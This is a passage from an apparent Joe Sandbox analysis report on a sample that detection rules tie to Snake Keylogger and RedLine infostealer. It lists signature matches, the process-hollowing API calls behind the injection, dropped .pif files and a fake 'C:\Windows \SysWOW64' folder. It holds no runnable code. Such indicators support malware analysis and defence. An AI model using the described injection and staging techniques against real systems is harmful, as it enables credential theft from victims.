            Source: 00000017.00000002.2542884762.0000000034951000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 0000001A.00000001.1548998614.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 00000017.00000002.2546648768.0000000035951000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 00000017.00000002.2541674509.0000000034690000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 00000017.00000002.2541674509.0000000034690000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 0000001A.00000002.2538166394.000000002AE90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 0000001A.00000002.2538166394.000000002AE90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 0000000E.00000002.2536490412.0000000026061000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: Process Memory Space: yihfsboC.pif PID: 7240, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: Process Memory Space: yihfsboC.pif PID: 7240, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: Process Memory Space: yihfsboC.pif PID: 7660, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: Process Memory Space: yihfsboC.pif PID: 7660, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: Process Memory Space: yihfsboC.pif PID: 7924, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: Process Memory Space: yihfsboC.pif PID: 7924, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeCode function: 0_2_02B28670 NtUnmapViewOfSection,0_2_02B28670
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeCode function: 0_2_02B28400 NtReadVirtualMemory,0_2_02B28400
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeCode function: 0_2_02B27A2C NtAllocateVirtualMemory,0_2_02B27A2C
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeCode function: 0_2_02B2DC8C RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,0_2_02B2DC8C
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeCode function: 0_2_02B2DC04 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile,0_2_02B2DC04
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeCode function: 0_2_02B28D70 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,0_2_02B28D70
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeCode function: 0_2_02B2DD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,0_2_02B2DD70
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeCode function: 0_2_02B27D78 NtWriteVirtualMemory,0_2_02B27D78
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeCode function: 0_2_02B27A2A NtAllocateVirtualMemory,0_2_02B27A2A
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeCode function: 0_2_02B2DBB0 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile,0_2_02B2DBB0
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeCode function: 0_2_02B28D6E GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,0_2_02B28D6E
            Source: C:\Users\Public\alpha.pifCode function: 16_2_003A643A NtOpenThreadToken,NtOpenProcessToken,NtClose,16_2_003A643A
            Source: C:\Users\Public\alpha.pifCode function: 16_2_003A4823 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,16_2_003A4823
            Source: C:\Users\Public\alpha.pifCode function: 16_2_003B7460 EnterCriticalSection,LeaveCriticalSection,fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,16_2_003B7460
            Source: C:\Users\Public\alpha.pifCode function: 16_2_003A64CA NtQueryInformationToken,16_2_003A64CA
            Source: C:\Users\Public\alpha.pifCode function: 16_2_003BA135 NtSetInformationFile,16_2_003BA135
            Source: C:\Users\Public\alpha.pifCode function: 16_2_003A6500 NtQueryInformationToken,NtQueryInformationToken,16_2_003A6500
            Source: C:\Users\Public\alpha.pifCode function: 16_2_003BC1FA SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memcpy,memcpy,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,16_2_003BC1FA
            Source: C:\Users\Public\alpha.pifCode function: 16_2_00394E3B _setjmp3,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,longjmp,16_2_00394E3B
            Source: C:\Users\Public\alpha.pifCode function: 16_2_003A4759 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,DeleteFileW,GetLastError,16_2_003A4759
            Source: C:\Users\Public\alpha.pifCode function: 19_2_003A643A NtOpenThreadToken,NtOpenProcessToken,NtClose,19_2_003A643A
            Source: C:\Users\Public\alpha.pifCode function: 19_2_003A4823 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,19_2_003A4823
            Source: C:\Users\Public\alpha.pifCode function: 19_2_003B7460 EnterCriticalSection,LeaveCriticalSection,fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,19_2_003B7460
            Source: C:\Users\Public\alpha.pifCode function: 19_2_003A64CA NtQueryInformationToken,19_2_003A64CA
            Source: C:\Users\Public\alpha.pifCode function: 19_2_003BA135 NtSetInformationFile,19_2_003BA135
            Source: C:\Users\Public\alpha.pifCode function: 19_2_003A6500 NtQueryInformationToken,NtQueryInformationToken,19_2_003A6500
            Source: C:\Users\Public\alpha.pifCode function: 19_2_003BC1FA SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memcpy,memcpy,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,19_2_003BC1FA
            Source: C:\Users\Public\alpha.pifCode function: 19_2_00394E3B _setjmp3,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,longjmp,19_2_00394E3B
            Source: C:\Users\Public\alpha.pifCode function: 19_2_003A4759 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,DeleteFileW,GetLastError,19_2_003A4759
            Source: C:\Users\Public\Libraries\Cobsfhiy.PIFCode function: 21_2_02AF8670 NtUnmapViewOfSection,21_2_02AF8670
            Source: C:\Users\Public\Libraries\Cobsfhiy.PIFCode function: 21_2_02AF8400 NtReadVirtualMemory,21_2_02AF8400
            Source: C:\Users\Public\Libraries\Cobsfhiy.PIF Code function: 21_2_02AF7A2C NtAllocateVirtualMemory
            Source: C:\Users\Public\Libraries\Cobsfhiy.PIF Code function: 21_2_02AF7D78 NtWriteVirtualMemory
            Source: C:\Users\Public\Libraries\Cobsfhiy.PIF Code function: 21_2_02AF8D70 Wow64GetThreadContext,Wow64SetThreadContext,NtResumeThread
            Source: C:\Users\Public\Libraries\Cobsfhiy.PIF Code function: 21_2_02AFDD70 NtOpenFile,NtReadFile
            Source: C:\Users\Public\Libraries\Cobsfhiy.PIF Code function: 21_2_02AF86F7 NtUnmapViewOfSection
            Source: C:\Users\Public\Libraries\Cobsfhiy.PIF Code function: 21_2_02AF7A2A NtAllocateVirtualMemory
            Source: C:\Users\Public\Libraries\Cobsfhiy.PIF Code function: 21_2_02AF8D6E Wow64GetThreadContext,Wow64SetThreadContext,NtResumeThread
            Source: C:\Users\Public\Libraries\Cobsfhiy.PIF Code function: 24_2_02BD8670 NtUnmapViewOfSection
            Source: C:\Users\Public\Libraries\Cobsfhiy.PIF Code function: 24_2_02BD8400 NtReadVirtualMemory
            Source: C:\Users\Public\Libraries\Cobsfhiy.PIF Code function: 24_2_02BD7A2C NtAllocateVirtualMemory
            Source: C:\Users\Public\Libraries\Cobsfhiy.PIF Code function: 24_2_02BD7D78 NtWriteVirtualMemory
            Source: C:\Users\Public\Libraries\Cobsfhiy.PIF Code function: 24_2_02BD8D70 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread
            Source: C:\Users\Public\Libraries\Cobsfhiy.PIF Code function: 24_2_02BDDD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtReadFile,NtClose
            Source: C:\Users\Public\Libraries\Cobsfhiy.PIF Code function: 24_2_02BD86F7 NtUnmapViewOfSection
            Source: C:\Users\Public\Libraries\Cobsfhiy.PIF Code function: 24_2_02BD7A2A NtAllocateVirtualMemory
            Source: C:\Users\Public\Libraries\Cobsfhiy.PIF Code function: 24_2_02BDDBB0 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile
            Source: C:\Users\Public\Libraries\Cobsfhiy.PIF Code function: 24_2_02BDDC8C RtlDosPathNameToNtPathName_U,NtWriteFile,NtClose
            Source: C:\Users\Public\Libraries\Cobsfhiy.PIF Code function: 24_2_02BDDC04 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile
            Source: C:\Users\Public\Libraries\Cobsfhiy.PIF Code function: 24_2_02BD8D6E GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread
            Source: C:\Users\Public\alpha.pif Code function: 16_2_00394C10: memset,GetFileSecurityW,GetSecurityDescriptorOwner,??_V@YAXPAX@Z,memset,CreateFileW,DeviceIoControl,memcpy,CloseHandle,??_V@YAXPAX@Z,memset,??_V@YAXPAX@Z,FindClose,??_V@YAXPAX@Z
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exe Code function: 0_2_02B28788 CreateProcessAsUserW
            Source: C:\Users\Public\alpha.pif File created: C:\Windows
            Source: C:\Users\Public\alpha.pif File created: C:\Windows \SysWOW64
            Source: C:\Users\Public\alpha.pif File deleted: C:\Windows \SysWOW64
            Source: Joe Sandbox ViewDropped File: C:\Users\Public\Libraries\yihfsboC.pif 7BCDC2E607ABC65EF93AFD009C3048970D9E8D1C2A18FC571562396B13EBB301
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: String function: 0040D606 appears 48 times
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: String function: 0040E1D8 appears 88 times
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeCode function: String function: 02B146D4 appears 244 times
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeCode function: String function: 02B289D0 appears 45 times
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeCode function: String function: 02B2894C appears 56 times
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeCode function: String function: 02B144DC appears 74 times
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeCode function: String function: 02B14500 appears 33 times
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeCode function: String function: 02B14860 appears 949 times
            Source: C:\Users\Public\Libraries\Cobsfhiy.PIFCode function: String function: 02BD894C appears 50 times
            Source: C:\Users\Public\Libraries\Cobsfhiy.PIFCode function: String function: 02AE46D4 appears 155 times
            Source: C:\Users\Public\Libraries\Cobsfhiy.PIFCode function: String function: 02BC4860 appears 683 times
            Source: C:\Users\Public\Libraries\Cobsfhiy.PIFCode function: String function: 02AE4860 appears 683 times
            Source: C:\Users\Public\Libraries\Cobsfhiy.PIFCode function: String function: 02BC46D4 appears 155 times
            Source: C:\Users\Public\Libraries\Cobsfhiy.PIFCode function: String function: 02AF894C appears 50 times
            Source: EPTMAcgvNZ.exe, Binary or memory string: OriginalFilename vs EPTMAcgvNZ.exe
            Source: EPTMAcgvNZ.exe, 00000000.00000002.1396601704.0000000020840000.00000004.00001000.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameeasinvoker.exej% vs EPTMAcgvNZ.exe
            Source: EPTMAcgvNZ.exe, 00000000.00000002.1396601704.0000000020840000.00000004.00001000.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameLOADER.EXEB vs EPTMAcgvNZ.exe
            Source: EPTMAcgvNZ.exe, 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameeasinvoker.exej% vs EPTMAcgvNZ.exe
            Source: EPTMAcgvNZ.exe, 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameLOADER.EXEB vs EPTMAcgvNZ.exe
            Source: EPTMAcgvNZ.exe, 00000000.00000002.1355304078.0000000002375000.00000004.00001000.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameeasinvoker.exej% vs EPTMAcgvNZ.exe
            Source: EPTMAcgvNZ.exe, 00000000.00000002.1413076026.000000007F200000.00000004.00001000.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameeasinvoker.exej% vs EPTMAcgvNZ.exe
            Source: EPTMAcgvNZ.exe, 00000000.00000002.1413076026.000000007F200000.00000004.00001000.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameTruesight4 vs EPTMAcgvNZ.exe
            Source: EPTMAcgvNZ.exe, 00000000.00000003.1351068324.00000000217FB000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameLOADER.EXEB vs EPTMAcgvNZ.exe
            Source: EPTMAcgvNZ.exe, 00000000.00000003.1347686581.00000000217C3000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameeasinvoker.exej% vs EPTMAcgvNZ.exe
            Source: EPTMAcgvNZ.exe, 00000000.00000003.1351068324.000000002179D000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameLOADER.EXEB vs EPTMAcgvNZ.exe
            Source: EPTMAcgvNZ.exe, 00000000.00000002.1415066252.000000007FB20000.00000004.00001000.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameLOADER.EXEB vs EPTMAcgvNZ.exe
            Source: EPTMAcgvNZ.exe, 00000000.00000002.1411922901.0000000021EF1000.00000004.00001000.00020000.00000000.sdmp, Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs EPTMAcgvNZ.exe
            Source: EPTMAcgvNZ.exe, 00000000.00000002.1409907919.0000000021A70000.00000004.00001000.00020000.00000000.sdmp, Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs EPTMAcgvNZ.exe
            Source: EPTMAcgvNZ.exe, 00000000.00000002.1409907919.0000000021A70000.00000004.00001000.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameLOADER.EXEB vs EPTMAcgvNZ.exe
            Source: EPTMAcgvNZ.exe, 00000000.00000003.1347686581.00000000217F2000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameeasinvoker.exej% vs EPTMAcgvNZ.exe
            Source: EPTMAcgvNZ.exe, 00000000.00000002.1396601704.00000000207F0000.00000004.00001000.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameLOADER.EXEB vs EPTMAcgvNZ.exe
            Source: EPTMAcgvNZ.exe, 00000000.00000002.1396601704.00000000207F0000.00000004.00001000.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameeasinvoker.exej% vs EPTMAcgvNZ.exe
            Source: EPTMAcgvNZ.exe, 00000000.00000003.1326762946.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameeasinvoker.exej% vs EPTMAcgvNZ.exe
            Source: EPTMAcgvNZ.exe, 00000000.00000003.1326762946.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameTruesight4 vs EPTMAcgvNZ.exe
            Source: EPTMAcgvNZ.exe, 00000000.00000003.1252312705.000000007FCDF000.00000004.00001000.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameeasinvoker.exej% vs EPTMAcgvNZ.exe
            Source: EPTMAcgvNZ.exe, Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
            Source: 14.2.yihfsboC.pif.400000.5.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 26.2.yihfsboC.pif.2b4c0000.10.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 26.2.yihfsboC.pif.2b4c0000.10.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 26.2.yihfsboC.pif.2ae90f08.8.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 26.2.yihfsboC.pif.2ae90f08.8.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 23.3.yihfsboC.pif.327be688.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 23.3.yihfsboC.pif.327be688.0.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 23.2.yihfsboC.pif.34860000.7.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 23.2.yihfsboC.pif.34860000.7.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 23.2.yihfsboC.pif.34860000.7.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 23.2.yihfsboC.pif.34860000.7.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 26.2.yihfsboC.pif.2ae90000.9.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 26.2.yihfsboC.pif.2ae90000.9.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 14.2.yihfsboC.pif.25d6b98e.8.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 14.2.yihfsboC.pif.25d6b98e.8.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 26.2.yihfsboC.pif.29915570.7.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 26.2.yihfsboC.pif.29915570.7.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 23.2.yihfsboC.pif.35955570.9.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 23.2.yihfsboC.pif.35955570.9.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 14.2.yihfsboC.pif.27066478.12.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 14.2.yihfsboC.pif.27066478.12.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 21.2.Cobsfhiy.PIF.20805c08.1.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 14.2.yihfsboC.pif.285a0f08.13.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 14.2.yihfsboC.pif.285a0f08.13.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 23.2.yihfsboC.pif.3598e790.8.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 23.2.yihfsboC.pif.3598e790.8.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 23.2.yihfsboC.pif.35956478.10.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 23.2.yihfsboC.pif.35956478.10.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 26.2.yihfsboC.pif.2994e790.6.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 26.2.yihfsboC.pif.2994e790.6.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 14.2.yihfsboC.pif.285a0000.14.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 14.2.yihfsboC.pif.285a0000.14.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 26.2.yihfsboC.pif.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 23.2.yihfsboC.pif.34690000.5.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 23.2.yihfsboC.pif.34690000.5.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 26.2.yihfsboC.pif.285db98e.4.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 26.2.yihfsboC.pif.285db98e.4.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
